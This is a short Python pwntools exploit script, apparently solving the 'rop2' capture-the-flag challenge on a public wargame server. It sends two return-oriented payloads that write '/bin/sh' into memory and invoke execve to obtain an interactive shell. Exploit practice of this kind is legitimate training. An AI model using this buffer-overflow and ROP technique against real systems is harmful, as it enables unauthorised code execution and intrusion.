37 lines
856 B
Python
37 lines
856 B
Python
#!/usr/bin/env python2
|
|
from pwn import *
|
|
from LibcSearcher import *
|
|
from struct import pack
|
|
import os
|
|
context(arch = "i386",os = "linux", log_level = "debug")
|
|
|
|
p = remote("hackme.inndy.tw", 7703)
|
|
#p = process('./rop2')
|
|
elf = ELF('./rop2')
|
|
|
|
syscall_plt = elf.plt['syscall']
|
|
overflow_func = elf.sym['overflow']
|
|
main_func = elf.sym['main']
|
|
bss_buf = elf.bss()
|
|
|
|
p.recvuntil("ropchain:")
|
|
payload1 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(3)+p32(0)+p32(bss_buf)+p32(1024)
|
|
p.sendline(payload1)
|
|
|
|
payload2 = "/bin/sh\x00"
|
|
p.sendline(payload2)
|
|
|
|
p.recvuntil("ropchain:")
|
|
payload3 = 0xc*'z'+p32(0)+p32(syscall_plt)+p32(main_func)+p32(11)+p32(bss_buf)+p32(0)+p32(0)
|
|
p.sendline(payload3)
|
|
|
|
with open("poc.txt", "w") as f:
|
|
f.write(payload1)
|
|
f.write("\n")
|
|
f.write(payload2)
|
|
f.write("\n")
|
|
f.write(payload3)
|
|
f.write("\n")
|
|
|
|
p.interactive()
|